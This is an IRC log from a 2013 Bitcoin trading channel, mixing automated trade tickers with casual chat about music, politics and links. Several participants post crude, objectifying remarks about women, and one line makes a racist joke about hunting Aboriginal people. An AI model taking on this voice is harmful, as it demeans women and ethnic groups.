07:16:05 [MPEX] [S.MPOE] 2003 @ 0.00089457 = 1.7918 BTC [-] Sep 13 07:17:30 [MPEX] [S.MG] 500 @ 0.00019001 = 0.095 BTC [+] Sep 13 07:17:32 [MPEX] [S.MG] 2500 @ 0.00019 = 0.475 BTC [-] Sep 13 07:19:00 [BTCTC] [TAT.MINIGAME] 26 @ 0.000238 = 0.0062 BTC [-] Sep 13 07:20:29 [BTCTC] [ACTIVEMINING] 2 @ 0.003122 = 0.0062 BTC [-] Sep 13 07:21:24 [BTCTC] [ACTIVEMINING] 200 @ 0.0031 = 0.62 BTC [-] Sep 13 07:21:38 [BTCTC] [ACTIVEMINING] 100 @ 0.0031 = 0.31 BTC [-] Sep 13 07:22:59 [BTCTC] [ACTIVEMINING] 3 @ 0.003118 = 0.0094 BTC [+] Sep 13 07:28:52 [BTCTC] [DMS.PURCHASE] 23 @ 0.01195 = 0.2749 BTC [-] Sep 13 07:28:53 [BTCTC] [DMS.PURCHASE] 17 @ 0.01196 = 0.2033 BTC [+] Sep 13 07:31:25 [BTCTC] [DMS.PURCHASE] 12 @ 0.01198 = 0.1438 BTC [+] Sep 13 07:37:50 [BTCTC] [CIPHERMINE.B1] 133 @ 0.0103 = 1.3699 BTC [-] Sep 13 07:38:02 [BTCTC] [LABCOIN] 85 @ 0.003525 = 0.2996 BTC [-] Sep 13 07:38:04 [BTCTC] [LABCOIN] 50 @ 0.003531 = 0.1766 BTC [+] Sep 13 07:38:46 [HAVELOCK] [CBTC] 55 @ 0.000385 = 0.0212 BTC [-] Sep 13 07:41:30 [HAVELOCK] [XBOND] 9 @ 0.001136 = 0.0102 BTC [+] Sep 13 07:41:56 most large breasts aren't on attractive women. Sep 13 07:42:18 [HAVELOCK] [CBTC] 19302 @ 0.00038001 = 7.335 BTC [-] Sep 13 07:44:23 mrs. chokesondick Sep 13 07:48:52 *ms. Sep 13 07:49:16 all this froth about driverless cars makes me want to short something Sep 13 07:53:04 short humanity, long skynet? Sep 13 07:55:05 large breasts look good on womens in clothes but when they let them out they flop all over the place and it all goes to hell..imo. Sep 13 07:56:15 true Sep 13 07:56:25 [HAVELOCK] [AM1] 10 @ 2.11 = 21.1 BTC [-] Sep 13 07:56:27 [HAVELOCK] [AM1] 1 @ 2.1 BTC [-] Sep 13 08:00:54 [BTCTC] [DMS.MINING] 55 @ 0.002625 = 0.1444 BTC [+] Sep 13 08:00:57 [BTCTC] [ACTIVEMINING] 50 @ 0.003146 = 0.1573 BTC [+] Sep 13 08:01:52 [MPEX] [S.MPOE] 8397 @ 0.00089878 = 7.5471 BTC [+] Sep 13 08:01:53 [MPEX] [S.MPOE] 5014 @ 0.0008996 = 4.5106 BTC [+] Sep 13 08:02:05 [MPEX] [S.MPOE] 3612 @ 0.00090028 = 3.2518 BTC [+] Sep 13 08:03:22 [BTCTC] [ASICMINER-PT] 1 @ 2.161 BTC [-] Sep 13 08:03:26 [BTCTC] [LABCOIN] 30 @ 0.003402 = 0.1021 BTC [-] Sep 13 08:04:06 [BTCTC] [TAT.MINIGAME] 5000 @ 0.000238 = 1.19 BTC [-] Sep 13 08:04:06 [BTCTC] [TAT.MINIGAME] 900 @ 0.000237 = 0.2133 BTC [-] Sep 13 08:04:08 [BTCTC] [TAT.MINIGAME] 2 @ 0.0002364 = 0.0005 BTC [-] Sep 13 08:04:09 [BTCTC] [TAT.MINIGAME] 9 @ 0.0002321 = 0.0021 BTC [-] Sep 13 08:04:10 [BTCTC] [TAT.MINIGAME] 4000 @ 0.000232 = 0.928 BTC [-] Sep 13 08:04:11 [BTCTC] [TAT.MINIGAME] 2000 @ 0.0002312 = 0.4624 BTC [-] Sep 13 08:11:23 all this wasp bite FUD! Sep 13 08:11:29 big boobs are great. Sep 13 08:12:07 classic internet discussion Sep 13 08:12:09 zero middle ground Sep 13 08:12:24 I hate middle grounds Sep 13 08:13:01 it's such a fallacy Sep 13 08:13:21 benkay Ds are the middle ground. Sep 13 08:13:26 and i happen to be quite happy with it. Sep 13 08:18:03 [BTCTC] [LABCOIN] 1000 @ 0.0034 = 3.4 BTC [-] Sep 13 08:18:04 [BTCTC] [LABCOIN] 1801 @ 0.003395 = 6.1144 BTC [-] Sep 13 08:18:06 [BTCTC] [LABCOIN] 570 @ 0.003327 = 1.8964 BTC [-] Sep 13 08:18:07 [BTCTC] [LABCOIN] 96 @ 0.003326 = 0.3193 BTC [-] Sep 13 08:18:08 [BTCTC] [LABCOIN] 9 @ 0.003301 = 0.0297 BTC [-] Sep 13 08:18:09 [BTCTC] [LABCOIN] 97 @ 0.0033 = 0.3201 BTC [-] Sep 13 08:18:40 and speaking of cups, Sep 13 08:18:41 http://fullerfigurefullerbust.com/tag/what-does-a-d-cup-look-like/ Sep 13 08:18:44 what does a D cup look like | Fuller Figure Fuller Bust Sep 13 08:21:26 Diablo-D3> someone tell mircea_popescu to take me off ignore Sep 13 08:21:30 why did you get ignored? Sep 13 08:21:40 he was channeling obama. Sep 13 08:23:06 [MPEX] [S.MPOE] 2123 @ 0.00089597 = 1.9021 BTC [-] Sep 13 08:23:11 somehow the US system is number+letter but still different from the french one Sep 13 08:23:25 why are boobs so complicated Sep 13 08:23:31 age old problem of people with metrics improving the granularity of thing so metered and not gaining and knowledge about stuff Sep 13 08:23:34 well japanese don't have boobs Sep 13 08:24:00 pankkake it's really fucking difficult to make well fitting bras. Sep 13 08:24:04 [MPEX] [S.MG] 9450 @ 0.0002183 = 2.0629 BTC [+] Sep 13 08:24:04 moreso than making well fitting shoes. Sep 13 08:24:05 [MPEX] [S.MG] 15000 @ 0.0002184 = 3.276 BTC [+] Sep 13 08:24:13 [MPEX] [S.MG] 8550 @ 0.0002185 = 1.8682 BTC [+] Sep 13 08:24:34 probably. though i have a hard time finding good shoes Sep 13 08:24:40 so then you know. Sep 13 08:24:50 I always thought D was much bigger than it rly is Sep 13 08:24:55 this entire idea of clothes is a little difficult in practice. Sep 13 08:25:08 KRS1 d cup simply is four inches more over the nips than over the ribs. Sep 13 08:25:24 it is a lot on a skinny teenager. it's not much on a healthy adult woman. Sep 13 08:26:20 yeh i c..i was with this stripper who had nice sized boobs but they were really big in circumference..not big like out there or anything..kind of odd..but natural- i prefer them natural, fake boobs dont feel right. Sep 13 08:26:56 depends who faked them. like anything else. Sep 13 08:27:05 yeh maybe Sep 13 08:27:09 I don't understand the hate against fake boobs Sep 13 08:27:22 maybe because I like body modification in general Sep 13 08:27:28 pankkake plenty of people don't touch that many boobs, and never felt a good boobjob. Sep 13 08:27:31 bad boob jobs make em feel cold, artificial. Sep 13 08:27:39 well I never felt fake boobs Sep 13 08:27:46 You should. Sep 13 08:27:48 so get out more. Sep 13 08:28:05 not much strippers in my encounters Sep 13 08:28:37 if the woman couldn't be a stripper she's a waste of time anyway. Sep 13 08:28:47 [BTCTC] [LABCOIN] 40 @ 0.003279 = 0.1312 BTC [-] Sep 13 08:30:26 [BTCTC] [LABCOIN] 1 @ 0.003279 BTC [-] Sep 13 08:31:06 you're better off dating men then Sep 13 08:31:55 yeah actually there are great women who are men inside Sep 13 08:32:16 smart yet slutty Sep 13 08:32:19 well yeah, this is what the "small tits" talk reduces too usually : people who'd rather date men. Sep 13 08:32:32 i happen to like women. Sep 13 08:34:15 reminds me of http://youtu.be/bI0-3BRjAYU Sep 13 08:40:15 all clits are like dicks. they're homologuous organs. Sep 13 08:40:59 if the girl would have been a boy her labia would have sutured making a scrotum and her clitoral hood would have turned into the prepuce. Sep 13 08:42:24 [BTCTC] [LABCOIN] 35 @ 0.0034 = 0.119 BTC [+] Sep 13 08:43:44 [HAVELOCK] [AM100] 10 @ 0.02139898 = 0.214 BTC [+] Sep 13 08:45:45 it's just a joke Sep 13 08:46:09 [BTCTC] [DMS.SELLING] 138 @ 0.009596 = 1.3242 BTC [+] Sep 13 08:46:27 ;;bc,stats Sep 13 08:46:30 Current Blocks: 257673 | Current Difficulty: 8.693301777119441E7 | Next Difficulty At Block: 258047 | Next Difficulty In: 374 blocks | Next Difficulty In About: 1 day, 20 hours, 52 minutes, and 47 seconds | Next Difficulty Estimate: 109441948.022 | Estimated Percent Change: 25.89227 Sep 13 08:52:20 [HAVELOCK] [HIM] 28 @ 0.1545 = 4.326 BTC [+] Sep 13 08:55:52 no it's not. and cunts are never going to look the same now!! Sep 13 09:04:12 [HAVELOCK] [CBTC] 1000 @ 0.00042 = 0.42 BTC [+] Sep 13 09:04:54 [MPEX] [S.MPOE] 2000 @ 0.00089597 = 1.7919 BTC [-] Sep 13 09:05:08 [HAVELOCK] [CBTC] 4000 @ 0.00042 = 1.68 BTC [+] Sep 13 09:06:34 [HAVELOCK] [CBTC] 1000 @ 0.00042 = 0.42 BTC [+] Sep 13 09:20:39 [MPEX] [S.MPOE] 1765 @ 0.00089904 = 1.5868 BTC [+] Sep 13 09:20:41 [HAVELOCK] [HIM] 2 @ 0.1545 = 0.309 BTC [+] Sep 13 09:31:38 [HAVELOCK] [AM100] 5 @ 0.02128999 = 0.1064 BTC [-] Sep 13 09:37:00 [BTCTC] [LABCOIN] 2 @ 0.003339 = 0.0067 BTC [-] Sep 13 09:38:44 http://behance.vo.llnwd.net/profiles21/432033/projects/9843603/dce79b3bbab45ad9879f9f156fdbb5bd.jpg Sep 13 09:41:43 mmm. Sep 13 09:54:32 [MPEX] [S.MPOE] 2050 @ 0.00089851 = 1.8419 BTC [-] Sep 13 09:54:34 [MPEX] [S.MPOE] 1800 @ 0.00089838 = 1.6171 BTC [-] Sep 13 09:59:43 [BTCTC] [TAT.ASICMINER] 5 @ 0.02116 = 0.1058 BTC [+] Sep 13 10:00:31 [MPEX] [S.MPOE] 3250 @ 0.00089716 = 2.9158 BTC [-] Sep 13 10:06:06 [MPEX] [S.MG] 59000 @ 0.0002 = 11.8 BTC [-] Sep 13 10:07:29 [MPEX] [S.MG] 3600 @ 0.0002 = 0.72 BTC [-] Sep 13 10:11:00 [MPEX] [S.MPOE] 1688 @ 0.00089865 = 1.5169 BTC [+] Sep 13 10:11:01 [MPEX] [S.MPOE] 4327 @ 0.00089597 = 3.8769 BTC [-] Sep 13 10:11:06 [MPEX] [S.MPOE] 485 @ 0.0008957 = 0.4344 BTC [-] Sep 13 10:35:34 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00065 BTC [+] Sep 13 10:38:36 [HAVELOCK] [SDSTM] 3 @ 0.00278999 = 0.0084 BTC [-] Sep 13 10:46:51 [HAVELOCK] [CBTC] 999 @ 0.00042499 = 0.4246 BTC [+] Sep 13 10:47:36 [HAVELOCK] [CBTC] 55 @ 0.00042777 = 0.0235 BTC [+] Sep 13 10:47:54 [BTCTC] [COGNITIVE] 1 @ 0.2675 BTC [-] Sep 13 10:47:56 [BTCTC] [COGNITIVE] 4 @ 0.2675 = 1.07 BTC [-] Sep 13 10:47:57 [BTCTC] [COGNITIVE] 37 @ 0.2664 = 9.8568 BTC [-] Sep 13 10:48:01 [HAVELOCK] [CBTC] 196 @ 0.000438 = 0.0858 BTC [+] Sep 13 10:48:45 [HAVELOCK] [AM100] 2 @ 0.02129 = 0.0426 BTC [+] Sep 13 10:50:26 [BTCTC] [LABCOIN] 20 @ 0.00328 = 0.0656 BTC [-] Sep 13 10:51:25 [MPEX] [S.MPOE] 9800 @ 0.00089649 = 8.7856 BTC [+] Sep 13 10:57:39 [HAVELOCK] [XBOND] 2 @ 0.00117 = 0.0023 BTC [+] Sep 13 11:02:35 [MPEX] [S.MPOE] 500 @ 0.00089649 = 0.4482 BTC [+] Sep 13 11:02:37 [MPEX] [S.MPOE] 5800 @ 0.00089709 = 5.2031 BTC [+] Sep 13 11:02:53 [MPEX] [S.MPOE] 6948 @ 0.00089904 = 6.2465 BTC [+] Sep 13 11:02:54 [MPEX] [S.MPOE] 4502 @ 0.00089911 = 4.0478 BTC [+] Sep 13 11:05:24 [HAVELOCK] [XBOND] 90 @ 0.00117 = 0.1053 BTC [+] Sep 13 11:18:43 [MPEX] [S.MPOE] 4117 @ 0.00089911 = 3.7016 BTC [+] Sep 13 11:18:44 [MPEX] [S.MPOE] 1333 @ 0.00090028 = 1.2001 BTC [+] Sep 13 11:27:36 [HAVELOCK] [AM100] 2 @ 0.02129 = 0.0426 BTC [+] Sep 13 11:34:47 [MPEX] [S.MPOE] 3305 @ 0.00090028 = 2.9754 BTC [+] Sep 13 11:34:49 [MPEX] [S.MPOE] 10200 @ 0.00090039 = 9.184 BTC [+] Sep 13 11:37:22 anyone on channel? Sep 13 11:38:21 leipzig? Sep 13 11:39:45 shall we imagine jazzy beats while i create peotry? Sep 13 11:40:58 shall i design a flange coupling for a machine as yet unseen? Sep 13 11:40:59 [BTCTC] [ACTIVEMINING] 160 @ 0.00308 = 0.4928 BTC [-] Sep 13 11:41:18 machine Sep 13 11:41:26 is this an iq test? Sep 13 11:42:04 [BTCTC] [LABCOIN] 1 @ 0.003281 BTC [+] Sep 13 11:42:06 [BTCTC] [LABCOIN] 15 @ 0.00328 = 0.0492 BTC [-] Sep 13 11:42:07 [BTCTC] [LABCOIN] 484 @ 0.00328 = 1.5875 BTC [-] Sep 13 11:42:09 [BTCTC] [LABCOIN] 500 @ 0.003278 = 1.639 BTC [-] Sep 13 11:42:10 [BTCTC] [LABCOIN] 285 @ 0.003275 = 0.9334 BTC [-] Sep 13 11:42:11 [BTCTC] [LABCOIN] 922 @ 0.00325 = 2.9965 BTC [-] Sep 13 11:42:12 [BTCTC] [LABCOIN] 97 @ 0.003248 = 0.3151 BTC [-] Sep 13 11:42:13 [BTCTC] [LABCOIN] 99 @ 0.003222 = 0.319 BTC [-] Sep 13 11:42:15 [BTCTC] [LABCOIN] 1597 @ 0.003222 = 5.1455 BTC [-] Sep 13 11:42:50 fabulous, on friday, here by the date line Sep 13 11:43:20 suits made fresh, custom and its all mine Sep 13 11:43:42 bluestone education quit now im all mine Sep 13 11:43:55 [BTCTC] [CIPHERMINE.B1] 168 @ 0.01032 = 1.7338 BTC [+] Sep 13 11:43:56 [BTCTC] [CIPHERMINE.B1] 100 @ 0.01031 = 1.031 BTC [-] Sep 13 11:44:06 la di da and it one less line Sep 13 11:44:40 you bored ? Sep 13 11:44:46 yep Sep 13 11:44:59 ive never spoken to you but ive got an iq crush Sep 13 11:45:03 so do a forum ipo. Sep 13 11:45:13 pardon? Sep 13 11:45:19 lol what's an iq crush Sep 13 11:45:42 well i love your 2.5 flavours of irony you include in all your writing Sep 13 11:45:54 oic. Sep 13 11:46:04 and ive got a soft spot for romainians too Sep 13 11:46:04 [HAVELOCK] [AM100] 1 @ 0.02129 BTC [+] Sep 13 11:46:15 however i spell it Sep 13 11:46:22 [MPEX] [S.MPOE] 7795 @ 0.00090197 = 7.0309 BTC [+] Sep 13 11:46:24 [MPEX] [S.MPOE] 405 @ 0.0008957 = 0.3628 BTC [-] Sep 13 11:46:45 i met some reall nice guys here in oz off the back of 89 Sep 13 11:46:58 ive never been Sep 13 11:47:03 romanians like to travel it seems. Sep 13 11:47:26 well i can't blame them, its been hard for many over recent years Sep 13 11:47:42 would you agree? Sep 13 11:48:45 i met a guy a bit older than me Sep 13 11:48:55 maybe 5 or 7 years Sep 13 11:49:40 he had obviouslay had a beautiful life, but he was reay for a change of scenery for whatever reason Sep 13 11:49:57 and his wife made cakes Sep 13 11:50:09 carrot cake Sep 13 11:50:19 exactly right Sep 13 11:51:24 beautiful Sep 13 11:52:04 i never knew something could be exactly right until i tried that carrot cake Sep 13 11:52:19 good morning Sep 13 11:52:28 oh yes, some cakes are magic Sep 13 11:52:54 i wont ry to descibe it, im sure romanians know. Sep 13 11:53:03 [HAVELOCK] [XBOND] 18 @ 0.00117 = 0.0211 BTC [+] Sep 13 11:53:42 now i have to satisfy myself with freshlyfallen apple Sep 13 11:53:54 omg sounds dirty Sep 13 11:55:30 lol Sep 13 11:55:41 ive lived on walnuts for weeks, it's better than beer Sep 13 11:56:00 i always thought carrot cake came from slovenia. Sep 13 11:56:08 perhaps Sep 13 11:56:25 this romanian woman had the moisture just right Sep 13 11:56:35 ir brightened my year Sep 13 11:57:15 oh my dirty brain, again.. Sep 13 11:57:25 she was also hot Sep 13 11:57:43 too hot to be a friends wife lol Sep 13 11:57:54 its true but im joking Sep 13 11:58:11 :) Sep 13 11:58:24 i hope he doesnt view these logs Sep 13 11:59:09 so what, you appreciated his wife's moisture. Sep 13 11:59:19 not like she's made of soap, to wear out... Sep 13 11:59:20 yes, that's his problem Sep 13 11:59:29 thats about the sum of it, in cake form tho Sep 13 12:00:21 and like sex good cake is excellent and bad cake is ok Sep 13 12:01:19 am i wasting my time? Sep 13 12:01:28 everyone is, dont worry Sep 13 12:01:41 i usually dont Sep 13 12:02:24 from whence do you hail juro? Sep 13 12:02:37 slovakia, europe Sep 13 12:02:46 where in slovakia? Sep 13 12:02:52 bratislava Sep 13 12:03:35 if you imagine the world with eight poles, i am at an opposite end Sep 13 12:03:41 are there more places in slovakia ?! Sep 13 12:03:42 or 9 or 12 Sep 13 12:04:12 mircea yes, mostly used for vacations Sep 13 12:04:31 pebble beaches? Sep 13 12:05:04 yea some, at danube and lakes Sep 13 12:05:08 or am i showing my lack of knowledge in eastern europen geography? Sep 13 12:05:30 its quite limited Sep 13 12:05:53 and you? australia? Sep 13 12:06:25 yes, currently in one of the outposts that is barely civilised Sep 13 12:06:49 but man is man and i find my place Sep 13 12:06:57 how do they call it... outback? Sep 13 12:07:19 [BTCTC] [LABCOIN] 1 @ 0.003231 BTC [+] Sep 13 12:07:20 [BTCTC] [LABCOIN] 406 @ 0.00323 = 1.3114 BTC [-] Sep 13 12:07:21 [BTCTC] [LABCOIN] 150 @ 0.003228 = 0.4842 BTC [-] Sep 13 12:07:22 [BTCTC] [LABCOIN] 500 @ 0.003225 = 1.6125 BTC [-] Sep 13 12:07:23 [BTCTC] [LABCOIN] 3233 @ 0.003222 = 10.4167 BTC [-] Sep 13 12:07:27 on the coast, great barrier reef Sep 13 12:07:43 but i see too much Sep 13 12:08:07 too much? Sep 13 12:08:36 and we just had a disasterous election, not that it could have gone any other way Sep 13 12:09:13 yes? i heard you have some ubercool voting system Sep 13 12:10:18 this is the end of the earth, make no mistake Sep 13 12:11:51 not that it all makes a difference..i just saw how our MP occupied the pulpit for 2 hours and requested to speak with some ministry Sep 13 12:12:08 till the chairman ordered to bring replacement pulpit Sep 13 12:12:37 im not awae of that Sep 13 12:13:32 [BTCTC] [DMS.MINING] 4 @ 0.00266 = 0.0106 BTC [+] Sep 13 12:14:09 of course, if anyone followed crazy politicans all around the world, would end badly for him Sep 13 12:14:21 not sure whole escapade got even translated to english Sep 13 12:14:27 how do you mean? Sep 13 12:14:55 [BTCTC] [BASIC-MINING] 3 @ 0.1306 = 0.3918 BTC [-] Sep 13 12:14:56 [BTCTC] [BASIC-MINING] 1 @ 0.1293 BTC [-] Sep 13 12:14:58 [BTCTC] [BASIC-MINING] 12 @ 0.1293 = 1.5516 BTC [-] Sep 13 12:14:59 [BTCTC] [BASIC-MINING] 5 @ 0.1292 = 0.646 BTC [-] Sep 13 12:15:00 [BTCTC] [BASIC-MINING] 1 @ 0.125 BTC [-] Sep 13 12:15:01 [BTCTC] [BASIC-MINING] 6 @ 0.1244 = 0.7464 BTC [-] Sep 13 12:15:02 [BTCTC] [BASIC-MINING] 26 @ 0.1243 = 3.2318 BTC [-] Sep 13 12:15:04 [BTCTC] [BASIC-MINING] 1 @ 0.1236 BTC [-] Sep 13 12:15:05 [BTCTC] [BASIC-MINING] 1 @ 0.12 BTC [-] Sep 13 12:15:05 [BTCTC] [BASIC-MINING] 11 @ 0.12 = 1.32 BTC [-] Sep 13 12:15:06 [BTCTC] [BASIC-MINING] 1 @ 0.12 BTC [-] Sep 13 12:15:07 [BTCTC] [BASIC-MINING] 24 @ 0.1174 = 2.8176 BTC [-] Sep 13 12:15:08 [BTCTC] [BASIC-MINING] 20 @ 0.1173 = 2.346 BTC [-] Sep 13 12:15:49 i mean to say what do you mean Sep 13 12:15:50 i mean, of course you re not aware what MPs do in some ass-european country Sep 13 12:16:05 jurov you got filibustering there ? Sep 13 12:16:07 same here, but worse Sep 13 12:16:13 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.0006521 = 0.0052 BTC [+] Sep 13 12:16:28 [BTCTC] [NASTY-PT] 6 @ 0.001856 = 0.0111 BTC [-] Sep 13 12:16:39 filibustering this channel? lol Sep 13 12:17:05 oh you mean filibustering the parliament.. ofc Sep 13 12:17:12 no i mean in your parliament. yeah Sep 13 12:17:41 [BTCTC] [BITVPS] 4 @ 0.001996 = 0.008 BTC [-] Sep 13 12:17:49 but that one member is exceptional case.. Sep 13 12:18:10 [HAVELOCK] [XBOND] 100 @ 0.00117 = 0.117 BTC [+] Sep 13 12:19:14 [BTCTC] [BASIC-MINING] 1 @ 0.116 BTC [-] Sep 13 12:19:16 [BTCTC] [BASIC-MINING] 12 @ 0.116 = 1.392 BTC [-] Sep 13 12:20:05 [BTCTC] [RSM] 2 @ 0.003743 = 0.0075 BTC [-] Sep 13 12:20:06 http://www.youtube.com/watch?feature=player_embedded&v=GGD_lYjpFOE#t=23 meeting voters on a horse is quite unusual, i think Sep 13 12:20:35 seems to really work with the women :) Sep 13 12:20:43 [HAVELOCK] [CBTC] 106 @ 0.000438 = 0.0464 BTC [+] Sep 13 12:20:45 [BTCTC] [RSM] 21 @ 0.003742 = 0.0786 BTC [-] Sep 13 12:20:47 [BTCTC] [RSM] 4 @ 0.003739 = 0.015 BTC [-] Sep 13 12:21:07 im not gonna watch that, but if you have any good slovakian music i will listen Sep 13 12:21:53 what genre? Sep 13 12:22:35 europop? :) Sep 13 12:22:47 whatever is good for the mind Sep 13 12:23:13 [MPEX] [S.MPOE] 4100 @ 0.00090417 = 3.7071 BTC [+] Sep 13 12:23:21 [MPEX] [S.MPOE] 5100 @ 0.00090484 = 4.6147 BTC [+] Sep 13 12:23:23 http://www.youtube.com/watch?v=XQGK1mbPDEU you mean the cheesy kind? Sep 13 12:23:23 [MPEX] [S.MPOE] 2900 @ 0.00090559 = 2.6262 BTC [+] Sep 13 12:24:28 thats it Sep 13 12:24:54 do sexy babes do folk music too? Sep 13 12:27:05 http://www.youtube.com/watch?NR=1&feature=endscreen&v=b4OlF4eTDBM Sep 13 12:27:11 http://www.youtube.com/watch?v=c3Igxon-AS4 Sep 13 12:27:30 http://www.youtube.com/watch?v=8doGVR7QHwg sexy babe here Sep 13 12:27:36 same lasy? Sep 13 12:27:41 *lady Sep 13 12:27:57 no Sep 13 12:28:13 looks similar, the australian, to your first song Sep 13 12:29:37 the first song is almost 20 years old :) Sep 13 12:30:27 [MPEX] [S.MPOE] 5500 @ 0.00089762 = 4.9369 BTC [-] Sep 13 12:30:55 5then its definately not the same ladyv :) Sep 13 12:32:03 http://www.youtube.com/watch?v=VaqLw1CvPMk Sep 13 12:34:44 these are the aboriginees? do they sing in their own language, too? Sep 13 12:35:01 some do, theses hundreds of languages Sep 13 12:35:37 this guy is yonglu Sep 13 12:36:02 seems a bit off to sing about own homeland in foreign language Sep 13 12:36:19 everyone speaks english now Sep 13 12:36:51 except for very old people Sep 13 12:37:56 and hes talking about his wife in central australia, which wouldnt have happened b4 whiteies came Sep 13 12:38:07 too far to walk Sep 13 12:38:22 http://www.youtube.com/watch?v=i-i0FQBbO8E Sep 13 12:38:25 cop this Sep 13 12:38:42 hes blind Sep 13 12:38:55 you were still hunting them for sport until a few years ago Sep 13 12:39:08 perhaps, before my time Sep 13 12:43:58 welome to the future Sep 13 12:46:59 [MPEX] [S.MPOE] 5210 @ 0.0008957 = 4.6666 BTC [-] Sep 13 12:47:01 [MPEX] [S.MPOE] 352 @ 0.00089457 = 0.3149 BTC [-] Sep 13 12:47:07 nice song. going afk Sep 13 12:47:07 [MPEX] [S.MPOE] 4988 @ 0.00089383 = 4.4584 BTC [-] Sep 13 12:47:11 satoshi was indonesia as quick as you like when the shit hit 200 Sep 13 12:47:18 [BTCTC] [RSM] 356 @ 0.003742 = 1.3322 BTC [+] Sep 13 12:48:30 cant hide in hugary Sep 13 12:50:37 mp and crew always wecome at mine Sep 13 12:51:39 i know its not necessary, but still Sep 13 12:53:29 mainly coz mp crew is sexy and look good on my yacht Sep 13 12:55:51 raw fish Sep 13 13:00:01 im thinking about going to a bitcoin meetup, first time ive seen a person for years Sep 13 13:02:31 http://www.youtube.com/watch?v=gKw5mBh4rYs Sep 13 13:03:39 [HAVELOCK] [XBOND] 650 @ 0.00117 = 0.7605 BTC [+] Sep 13 13:04:22 [HAVELOCK] [XBOND] 3450 @ 0.001173 = 4.0469 BTC [+] Sep 13 13:05:00 [BTCTC] [LABCOIN] 48 @ 0.003324 = 0.1596 BTC [+] Sep 13 13:06:14 whos got wharfendales? Sep 13 13:07:07 makakengurai Sep 13 13:07:20 [BTCTC] [LABCOIN] 60 @ 0.003325 = 0.1995 BTC [+] Sep 13 13:07:45 http://www.youtube.com/watch?v=6eB0RyRPH6Q Sep 13 13:07:49 experience Sep 13 13:08:02 [BTCTC] [ACTIVEMINING] 196 @ 0.002904 = 0.5692 BTC [-] Sep 13 13:08:03 [BTCTC] [ACTIVEMINING] 50 @ 0.002901 = 0.1451 BTC [-] Sep 13 13:08:05 [BTCTC] [ACTIVEMINING] 77 @ 0.002858 = 0.2201 BTC [-] Sep 13 13:08:06 [BTCTC] [ACTIVEMINING] 160 @ 0.002857 = 0.4571 BTC [-] Sep 13 13:08:07 [BTCTC] [ACTIVEMINING] 150 @ 0.002855 = 0.4283 BTC [-] Sep 13 13:08:08 [BTCTC] [ACTIVEMINING] 1 @ 0.002853 BTC [-] Sep 13 13:08:17 gambling Sep 13 13:08:19 [BTCTC] [ACTIVEMINING] 5 @ 0.002852 = 0.0143 BTC [-] Sep 13 13:08:21 [BTCTC] [ACTIVEMINING] 7 @ 0.002845 = 0.0199 BTC [-] Sep 13 13:08:22 [BTCTC] [ACTIVEMINING] 30 @ 0.002844 = 0.0853 BTC [-] Sep 13 13:08:23 [BTCTC] [ACTIVEMINING] 158 @ 0.002843 = 0.4492 BTC [-] Sep 13 13:08:24 [BTCTC] [ACTIVEMINING] 155 @ 0.002842 = 0.4405 BTC [-] Sep 13 13:08:25 [BTCTC] [ACTIVEMINING] 49 @ 0.002841 = 0.1392 BTC [-] Sep 13 13:08:26 [BTCTC] [ACTIVEMINING] 429 @ 0.00284 = 1.2184 BTC [-] Sep 13 13:08:27 [BTCTC] [ACTIVEMINING] 288 @ 0.002803 = 0.8073 BTC [-] Sep 13 13:08:28 [BTCTC] [ACTIVEMINING] 100 @ 0.002802 = 0.2802 BTC [-] Sep 13 13:08:29 [BTCTC] [ACTIVEMINING] 545 @ 0.002801 = 1.5265 BTC [-] Sep 13 13:10:00 [BTCTC] [CRYPTO-TRADE] 11 @ 0.1999 = 2.1989 BTC [+] Sep 13 13:10:01 [BTCTC] [CRYPTO-TRADE] 4 @ 0.1999 = 0.7996 BTC [+] Sep 13 13:12:15 http://www.youtube.com/watch?v=ajeL87l3prM this is for all the feminists Sep 13 13:13:21 2.5 flavours . love it Sep 13 13:14:03 [BTCTC] [BASIC-MINING] 8 @ 0.1159 = 0.9272 BTC [-] Sep 13 13:14:45 [BTCTC] [BASIC-MINING] 19 @ 0.116 = 2.204 BTC [+] Sep 13 13:15:44 http://www.youtube.com/watch?v=oBIxScJ5rlY big love Sep 13 13:16:45 [BTCTC] [DMS.MINING] 2 @ 0.00266 = 0.0053 BTC [+] Sep 13 13:16:47 [BTCTC] [DMS.MINING] 17 @ 0.00268 = 0.0456 BTC [+] Sep 13 13:16:48 [BTCTC] [DMS.MINING] 411 @ 0.002681 = 1.1019 BTC [+] Sep 13 13:16:49 [BTCTC] [DMS.MINING] 50 @ 0.002685 = 0.1343 BTC [+] Sep 13 13:18:39 [BTCTC] [KENILWORTH] 5 @ 0.001788 = 0.0089 BTC [+] Sep 13 13:20:09 dont get me started on kenilworth Sep 13 13:20:28 ira bullshit Sep 13 13:21:24 it seems every stock out there is tanking. so frustrated. Sep 13 13:22:14 [BTCTC] [DMS.MINING] 411 @ 0.002687 = 1.1044 BTC [+] **** BEGIN LOGGING AT Fri Sep 13 18:26:13 2013 Sep 13 18:26:54 [HAVELOCK] [VTX] 1 @ 0.59 BTC [-] Sep 13 18:28:27 vanderslice reminds me of Hayden Sep 13 18:31:05 http://www.youtube.com/watch?v=04dueeuUKlM Sep 13 18:31:18 yeah i like Hayden too Sep 13 18:31:22 [BTCTC] [ACTIVEMINING] 1 @ 0.002906 BTC [+] Sep 13 18:31:24 [BTCTC] [ACTIVEMINING] 797 @ 0.002906 = 2.3161 BTC [+] Sep 13 18:31:32 listen to rap more than indie lately tho Sep 13 18:31:43 just not depressed enough i guess Sep 13 18:31:45 :) Sep 13 18:31:55 heh Sep 13 18:31:59 hey b'y! Sep 13 18:32:19 rap is my favourite genre of music, i think Sep 13 18:32:22 but i like so little of it Sep 13 18:32:27 for the rappers http://www.youtube.com/watch?v=6lg51dzWHJE Sep 13 18:32:34 ThickAsThieves you ever seen high fidelity ? Sep 13 18:33:04 yes Sep 13 18:33:19 good but somewhat cringeworthy Sep 13 18:33:22 I like Chad VanGaalen. I dig ethereal vocals - hadn't heard him before. Sep 13 18:33:44 HIgh Fidelity was awesome. Sep 13 18:34:08 is Chad VanGaalen considered ethereal? Sep 13 18:34:12 ThickAsThieves "was i listening to pop music because i was depressed ? or was i depressed because i was listening to pop music ?" Sep 13 18:34:18 kleeck: "diaper island" is a good album Sep 13 18:35:28 what happened to the FotC guys? Sep 13 18:35:34 kleeck: http://www.youtube.com/watch?v=v9V7FfCAkco Sep 13 18:36:08 I've got something here you rap guys might appreciate Sep 13 18:36:13 one sec, uploading Sep 13 18:36:49 [MPEX] [S.MPOE] 7350 